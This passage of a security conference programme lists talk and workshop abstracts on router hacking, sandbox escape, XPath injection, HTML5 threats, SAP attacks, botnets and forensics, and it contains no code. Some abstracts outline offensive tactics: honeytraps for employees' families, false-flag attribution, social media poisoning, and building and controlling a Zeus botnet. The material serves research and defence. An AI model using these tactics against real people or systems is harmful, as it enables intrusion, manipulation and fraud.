Many people (Steve included, until recently) hold the opinion that the little black boxes you use to connect to the Internet are mostly little black boxes that do little else. When he bought a portable MiFi hotspot, little did he know that after peeling back the covers he would hold in his hands one of the most easily re-purposed malicious toolkits. In this talk, Steve will walk delegates through firmware analysis, router hacking techniques and finally through modification in order to re-use them for nefarious purposes. There may (or may not) be demos if there's time. Just make sure that the wifi network you're connecting to is the one you think it is and not Steve's.

Rafal Los - Shane MacDougall
Offensive Threat Modeling for Attackers: Turning Threat Modeling on its Head

Modern threat modeling is a defensive response to understanding a threat so as to prepare yourself, your network, and your assets. This talk shows how threat modeling can be used as an offensive weapon. While traditional threat modeling looks at the attacker, the asset and the system – offensive threat modeling looks back at the defender to understand his tactics and expose weaknesses.

This talk focuses heavily (but not exclusively) on the human side of the defensive equation to get inside the mind of the defender. Combining expertise in intelligence gathering through social reconnaissance and various other methods of social engineering with expertise in traditional threat modeling and penetration testing – this talk yields a powerful new weapon in the attacker's toolbox.

The speakers will highlight the attack vectors used by nation states and organized groups in "APT" attacks, which encompass a holistic approach to fingerprinting and profiling targets (Posture and Position) to yield devastating results. In many cases, data culled from social media, supply chain, satellite imagery, property management, conference attendance, personal browsing predispositions, sales literature, even political campaign donations can be aggregated and prioritized to increase the likelihood of success. In one example, we show how "grey area" websites that allow users to sign up as "providers", once past their trivial validation, can obtain useful information about potential clients registered with the website. Information gleaned over many of these sites in cities where a target has a presence can be used to identify persons or organizations at risk of attack/blackmail.

Tactics taught will include social media monitoring of employee actions and locations (Position and Predisposition) to create near real-time actionable pretexting for social engineering attacks. Additional back channel attacks focus on employee home networks, allowing for successful network penetration of a company while never targeting the company directly (Predisposition, Posture, and Position). This is accomplished via psychological profiling and sentiment analysis of users, to deploy specific honeytraps for employees and their families (Predisposition) and reverse honeypots for target company InfoSec groups (Position) as adjunct attack vectors. Counterintelligence, misdirection, weaknesses of other attackers (if they exist and can be identified/created), and false flag attribution are utilized to increase effectiveness of the attack, tie up defenders, and minimize detection (Posture and Position). We will also show how to utilize social media poisoning, where we attempt to change both public and employee perception of the target, incentivizing attacks both externally and from within (Predisposition).

Much like a spy movie plot, this talk will provide the attacker with the necessary tools to know their target, control the situation more effectively, and have a greater chance at successfully reaching their goal. This talk is meant to be used to understand how the other side (the attackers) sees you (the defenders) in any scenario and what the defenders should expect … to formulate a solid defensive posture.

Guillaume Lovet - Zhenhua Liu
Breeding Sandworms: How To Fuzz Your Way Out of Adobe Reader's Sandbox

Adobe's interpretation of sandboxing is called Adobe Reader X Protected Mode. Inspired by Microsoft's Practical Windows Sandboxing techniques, it was introduced in July 2010. So far, it has done a good job of limiting the impact of exploitable bugs in Adobe Reader X, as escaping the sandbox after successful exploitation turned out to be particularly challenging and has not yet been witnessed in the wild.

This paper exposes how we did just this: By leveraging some broker APIs, a policy flaw, and a little more, we were able to break free from Adobe's sandbox.

The particular vulnerability we used was patched by Adobe in September 2011 (CVE-2011-1353), as a result of our responsible disclosure; yet this demonstrates that Adobe's sandbox cannot be considered a panacea against the exploitation of security flaws in Adobe Reader X, and paves the way toward further interesting discoveries for security researchers.

Indeed, beyond this particular vulnerability, this paper dives deep into the sandbox implementation of Adobe Reader X, and debates ways to audit its broker APIs, which, to our minds, offer a major attack surface. In particular, the paper details how we configured an open-source fuzzing tool to audit them through the IPC Framework.

Matias Madou
Secure in 2010? Broken in 2011!

In 2010, a security research firm stumbled on a couple of vulnerabilities in Apache OFBiz, a widely used open source enterprise automation software project. As a proof of concept, it posted a video showing how easy it was to become an administrator exploiting one of the XSS issues in the application. To remain credible, the OFBiz team was forced to invest in security. In fact, as a result of digging into its bug database, the OFBiz team gathered security knowledge from different sources to make its product better, and made a big push to resolve the known issues in early 2010. Barely a year later, the exact same code base thought to be secure is again seriously broken. This scenario actually occurs quite frequently for several reasons.

We begin this presentation by examining the new security enhancements that had been put in place by OFBiz. We will use new critical OFBiz vulnerabilities throughout the presentation to demonstrate how applications can be severely broken shortly after they were thought to be secure. We demonstrate how new categories of vulnerabilities discovered in 2011 and new detection capabilities are uncovering previously unfound weaknesses in applications. Continued testing with tools that incorporate the latest security knowledge is highly recommended for every corporation.

Nikhil Mittal
The Pwnage Saga Continues

When Kautilya was being written, only one thing was thought of: utter pwnage. Operating Systems continue to trust Human Interface Devices. If you are a HID, it means no X-ray, no pat-down and no random security check either ;) You are not supposed to be a threat by any countermeasure or security mechanism.

Many of us have been using Teensy in our penetration tests: a programmable USB microcontroller which can act as a 'keyboard' and be programmed to type whatever we wish. Kautilya is a toolkit for easing the use of Teensy in penetration tests. Some new and shiny attack methods have been implemented in it. This talk will focus on these new methods to get into modern Operating Systems. The talk will be full of live demonstrations.

Mariano Nunez Di Croce
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?

Global Fortune 1000 companies, large governmental organizations and defense entities have something in common: they rely on SAP platforms to run their business-critical processes and information. In this scenario, cyber-criminals looking to perform espionage, sabotage or financial fraud attacks know that these systems hold the business crown jewels.

But how difficult is it for them to break into an SAP system today? Are we properly protecting the business information, or are we exposed?

Five years ago, we were invited to hold the first public presentation on real-world cyber-threats to SAP systems at BlackHat Europe 2007. Since then, we have performed specialized Penetration Tests against the SAP platforms of several of the largest organizations in the world, enabling us to give an educated answer to those questions.

Join us in this new presentation to learn:

  • How a cyber-attacker may break into an SAP system, completely anonymously.
  • The Top-10 technical vulnerabilities found in real-world SAP implementations.
  • How well protected SAP systems are from attacks over the Internet and internal networks.
  • How feasible it is to detect attacks in real time and to perform forensic investigations.
  • The most effective measures to secure this business-critical platform.

This presentation will feature live demonstrations of attacks, war stories and statistics from real-world assessments.

Phil Polstra
Preventing "Oh Shit!" Moments for 20 Euros or Less

This presentation will discuss the use of microcontrollers in computer security and forensics. In particular, several small USB flash drive forensic devices will be demonstrated, including forensic duplicators and an inexpensive write blocker. All devices to be shown can be built for under US$30.

A USB write blocker can prevent the "Oh shit!" moment when you plug your flash drive full of your favorite security tools into a machine and watch as the machine's antivirus starts deleting your stuff. The write blocker is also useful for ensuring that a subject drive is not altered while evaluating whether or not there is anything interesting enough to warrant creating a forensic image.

The smallest USB duplicator fits inside an Altoids gum tin. It is portable enough to always have with you. A PC is not required to make forensic copies with this device.

Jerome Radcliffe
Issues with Embedded Device Disclosures: Helping the Vendors and Recognizing the End-Users

Computer security research often focuses on the disclosure of vulnerabilities in traditional computing systems, such as DNS or mail servers. Recently, however, there has been a growth in vulnerabilities being discovered in embedded devices such as automobiles, SCADA hardware, and medical devices. These non-traditional computing devices have additional complexities and impacts that are, as yet, unexamined.

First, although much is made of the process of disclosing the vulnerability itself, the responses of the marketplace and the manufacturer are rarely discussed. Companies that produce many of these devices are generally underprepared to handle newfound vulnerabilities.

Second, many of the disclosures involving these non-traditional devices impact more than just a vendor, a computer administrator, or a company. The end user, the individual with the most at risk from some vulnerabilities, is often unaware of a vulnerability unless the mainstream media takes an interest in the story.

At Black Hat 2011, for example, there was a presentation about vulnerabilities in insulin pumps, which struck a chord with the media and resonated within the diabetic community, eventually prompting quite a few diabetics to voice their opinions through blog posts and tweets.

A prominent diabetic blogger, Kerri Sparling from SixUntilMe, will talk about how a vulnerability disclosure can impact end users in ways that researchers usually are not aware of.

Damir Rajnovic
36 Views of Cyberspace

The word "cyberspace" is used today in many contexts, but it is not always clear what exactly that term describes and what it means. In this paper we will compare definitions of cyberspace from several sources. The sources are relevant entities such as national or regional governments, standardization bodies and a dictionary. The purpose of this comparison is to establish the range of notions of what cyberspace is and to derive an ontology of cyberspace.

We will analyse which categories (identified from the existing definitions of cyberspace) are required for cyberspace to exist. Finally, we will offer suggestions on what elements a definition of cyberspace should have.

Enno Rey - Daniel Mende
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Crypto Ecosystem

Modern "Enterprise" VoIP solutions are complex beasts. They usually encompass application servers (e.g. for mailboxes and to provide CTI functions), "infrastructure systems" for authentication or crypto, and "intelligent" phones.

At the end of the day, the inherent complexity means that - while "traditional" VoIP attacks (like re-directing, sniffing and reconstructing calls) might no longer work - we've been able to severely compromise every enterprise VoIP environment we've pentested in the last twelve months. Based on a number of war stories, in this talk we'll first lay out the relevant attack vectors and the protocol- or device-level vulnerabilities enabling them.

We will then focus on Cisco's Unified Communications solution, which seemingly has a mature, certificate-based crypto framework protecting both the signaling and the media transport. Well, seemingly. When closely inspecting the relevant parts and messages, it turns out that at some point all the key material can be replaced by attacker-chosen keys, which effectively means that we're down to cleartext-like attacks again...

For the first time we'll publicly provide a detailed technical explanation of the underlying vulnerabilities, show a live demo sniffing calls in a presumably fully encrypted environment and - of course ;-) - release a tool automating a number of steps of the complex overall attack. A discussion of potential mitigating controls, both at the technical level and at the provisioning-process level, completes the talk.

Tom Ritter
The IETF & The Future of Security Protocols: All The Signal, None of the Noise

The IETF meets in person three times a year and publishes dozens of standards - most of which take years to be implemented, if they ever are. The drafts are rarely talked about at conferences, on Twitter, or heard about in the development or security industry until long after they're finalized. But the Working Groups are surprisingly accessible, and the things being discussed now will provide long-term fixes for the attacks we've been hacking around today.

We'll talk about the things going on in the Web Security, Public Key Infrastructure, TLS, and DNS Working Groups and the improvements being made to Browsers, HTTP, and JavaScript - and draw conclusions about what will and won't work. Early successes include the experimental technology that first detected the DigiNotar Certificate Authority breach and TLS improvements that provide replacements for the parts that make cryptographers uneasy. And we'll talk about the things we're not as optimistic about, like Content Security Policy and why it hopes to end Cross Site Scripting but won't. We'll also do a short survey of the superficial and radical proposals to augment, replace, or bypass the Certificate Authority system.

Simon Roses Femerling
Smartphone's Apps Are Not That Smart: Insecure Development Practices

Mobile Apps are a growing business, with thousands of applications to choose from across the dominant mobile platforms and new Apps released every week. Users install all kinds of free Apps on their smartphones, and many users are willing to pay for commercial ones, usually because prices are low. Apps have become the new Web.

The Apps fever has led thousands of developers worldwide, experienced and inexperienced, to constantly release new and updated Apps to attract users, become popular and in most cases make a profit. Unfortunately, this development madness tends to sacrifice security and privacy.

This presentation unveils the ugly truth that too many Apps are highly insecure. The results are based on a security analysis performed on dozens of Apps on different smartphones, identifying flaws that can be avoided with safe development practices.

Paul Royal
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis

The detection of malware analysis environments has become popular and commoditized. Detection techniques previously reserved for more sophisticated forms of malware are now available to any novice cyber criminal. The use of next-generation virtualization-based malware analysis technologies considerably reduces the number of possible transparency shortcomings, but still fails to handle pathologically resistant malware instances that will only run on physical hardware.

Thus far, the execution of malware on physical (or bare-metal) hardware has been useful for one or a handful of malware samples of interest. However, this activity was manually driven and time intensive (e.g., infect, study, format, reinstall). This presentation will resolve these long-outstanding shortcomings by describing the design and implementation of a scalable, automated bare-metal malware analysis system, which can be constructed using inexpensive commodity hardware and freely available technologies. To motivate the need for this approach, previously unpublished detection attacks against popular environments used to automate malware analysis (i.e., VMware, QEMU) will be shown.

Rahul Sasi
IVR Security- Internal Network Attack via Phone Lines

The following research is on IVR (Interactive Voice Response) systems, which are currently used in Phone Banking, Call centers, Hospitals and corporations, mainly for information retrieval and Remote Management via Telephone lines. The paper explains a series of security issues concerning these (IVR) systems, exploitation techniques, and ways of carrying out attacks on an internal network via Telephone lines. A demonstration of a few exploits on IVR systems will be given, along with a real incident involving a critical, responsibly disclosed flaw in a bank's Phone Banking System.

Justin Searle
Dissecting Smart Meters

The Smart Grid brings greater benefits for electric utilities and customers alike; however, these benefits come at a cost from a security perspective. This presentation will explore the architecture of most Smart Meters, the protocols they use, a breakdown of their embedded components, and the functionality their headend servers contain. We'll explain the methodologies we've developed to perform penetration testing of these AMI systems, enumerate the types of vulnerabilities we commonly find, and discuss the solutions we recommend to Smart Meter vendors. We will even demonstrate at least one of the attacks we commonly perform in our penetration tests. This will be done without the FUD and over-hyped framing that we usually find in the media and other Smart Grid presentations.

Shreeraj Shah
HTML5 Top 10 Threats: Stealth Attacks and Silent Exploits

HTML5 is an emerging stack for next-generation applications. HTML5 enhances browser capabilities and is able to execute Rich Internet Applications in the context of modern browser architecture. Interestingly, HTML5 can run on mobile devices as well, which makes things even more complicated. HTML5 is not a single technology stack but a combination of various components like XMLHttpRequest (XHR), the Document Object Model (DOM), Cross-Origin Resource Sharing (CORS) and enhanced HTML/Browser rendering. It brings several new technologies to the browser which were not seen before, like localStorage, WebSQL, WebSocket, WebWorkers, enhanced XHR and DOM-based XPath, to name a few. It has enlarged the attack surface and the points of exploitation for attackers and malicious agents. By leveraging these vectors one can craft stealth attacks and silent exploits, which are hard to detect and make compromise easy.

In this paper and talk we are going to walk through these new architectures, the attack surface and possible threats. Here are the top 10 threats which we are going to cover in detail, with real-life examples and demos.

  • ClickJacking & Phishing by mixing layers and iframe
  • CSRF and leveraging CORS to bypass SOP
  • Attacking WebSQL and client side SQL injection
  • Stealing information from Storage and Global variables
  • HTML 5 tag abuse and XSS
  • HTML 5/DOM based XSS and redirects
  • DOM injections and Hijacking with HTML 5
  • Abusing thick client features
  • Using WebSockets for stealth attacks
  • Abusing WebWorker functionality

Understanding the above attack vectors will give a better idea of HTML5 security concerns and the required defenses. It is imperative to focus on these new attack vectors and start addressing them in today's environment, before attackers start leveraging these features to their advantage. We are also going to see new tricks and tools for scanning for HTML5 vulnerabilities.

Sumit Siddharth - Tom Forbes
Hacking XPATH 2.0

The presentation will discuss the XPath Injection vulnerability in depth and we will cover advanced exploitation techniques. We will talk about XPath 2.0 and how an attacker can not only obtain the XML document but also obtain files outside the current document. We will discuss how to exploit vulnerabilities blindly, in the case where the application does not reveal anything (i.e. compare this to time-based SQL injection). Exfiltrating data over out-of-band channels such as HTTP and DNS will also be discussed, followed by some real-life examples of the vulnerability found in the wild. Finally, we will release an open-source tool to automate exploiting this vulnerability, with all the advanced exploitation features built in.

Alexey Sintsov
Lotus Domino: Penetration Through the Controller

This talk will present an overview of some ways to break Lotus through the Domino Controller (including a 0day bug).

Didier Stevens
Malicious PDF Analysis

This workshop will teach you the fundamentals you need to know to analyze (malicious) PDF documents. Didier Stevens will familiarize you with PDFiD and pdf-parser, two essential tools for PDF analysis he authored.

Each attendee will receive a copy of a 20+ page PDF analysis document Didier Stevens authored. And yes, this document will be provided in the Portable Document Format, but hey, when you successfully complete this workshop, you will know how to identify malicious PDF files.

Ben Williams
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

After a thorough examination of a number of common Security Gateway products over the past few months I have determined that Security Gateway Web User Interfaces are often vulnerable to security flaws, which could enable an attacker to gain control of the UI, bypass controls within the application, and in many cases control the underlying operating system.

Based on this research I have reported over 30 vulnerabilities, complete with proof-of-concept exploits, to the vendors of these products.

This presentation will discuss vulnerabilities common across these products, weaknesses in product design, and some interesting attack vectors where external attackers can exploit Security Gateways via the UI, even where the attacker has no direct access to the UI.

Chris Wysopal
Data Mining a Mountain of Zero Day Vulnerabilities

Every day, software developers around the world, from Bangalore to Silicon Valley, churn out millions of lines of insecure code. We used static binary analysis on thousands of applications submitted to us by large enterprises, commercial software vendors, open source projects, and software outsourcers, to create an anonymized vulnerability data set. By mining this data we can answer some interesting questions.

Which industries have the most secure and least secure code? What types of mistakes do developers make most often? Which languages and platforms have the apps with the most vulnerabilities? Should you be most worried about internally built apps, open source, commercial software, or outsourcers? These questions and many more will be answered as we tunnel through zero day mountain.

Kyle Yang
The Kelihos Botnet

Kelihos is still alive, building its p2p infrastructure and sending spam. It quickly evolved after the b79 take-down operation. This raises numerous questions:

Did it survive the b79 operation, or was a new one simply rebuilt? How did it evolve? Are there any changes in its infrastructure? Did it change the p2p protocol or the communication encryption algorithms? What new functionality was added to it? In this presentation, I will attempt to shed light on those questions after examining the 3 main Kelihos generations, from their p2p protocol and encryption schemes to their working mechanisms.
Ken Baylor
Workshop: Understanding Botnets By Building One

Financial botnets are a major threat to the global Financial Infrastructure. Other botnets threaten our infrastructure. However, most security professionals have no hands-on botnet experience, which weakens their ability to combat them.

Gain hands-on experience of building and managing your own botnet from scratch in this workshop.

You will build your own Zeus botnet, configure and optimize it, and infect and control bots.

Eric Fulton
Workshop: Mobile Network Forensics

Intentionally or not, your phone leaks data to the world. What can you - or your enemies - uncover from mobile network traffic? Dig through real-life Android packet captures to uncover GPS coordinates, usernames and accounts, social networking data, and more. Dissect a traffic dump of Android malware and analyze phone data as it is exfiltrated to third-party servers. The second half of this workshop is a mobile network forensics contest. Each attendee will be given a mysterious USB drive and a note with a challenge. Students must use the skills they've gained in class to unravel the mystery. You are the forensics investigator. Can you solve the puzzle in time?

Nikhil Mittal
Workshop: Teensy Programming for Everyone

Breaking into systems using traditional methods is getting harder by the day. As a penetration tester or a security administrator you should know what methods an attacker may use to compromise a system. The emphasis of this training will be on using Teensy, which is a Human Interface Device. It is an Arduino-based board which can be programmed and used as a keyboard/mouse/disk.

Details of Kautilya, a toolkit developed by the trainer which eases the use of Teensy in Penetration Tests, will be discussed. The participants will learn how to program Teensy for their needs using the Arduino Development Environment (ADE) and also how to customize Kautilya.

There will be lots of attack vectors, discussions, hands-on work and fun. Participants should be able to program their own devices after the training.

Justin Searle
Workshop: SamuraiWTF

Come take the official Samurai-WTF workshop, given by one of the founders and lead developers of the project, and get a special pre-release copy of the next version of Samurai-WTF. You will learn the latest Samurai-WTF open source tools and be shown the latest techniques for performing web application assessments. Practice these skills on one of four vulnerable web applications installed and pre-configured on your Samurai-WTF live DVD. This experience will expand your hacking toolkit and take your web hacking skills to the next level.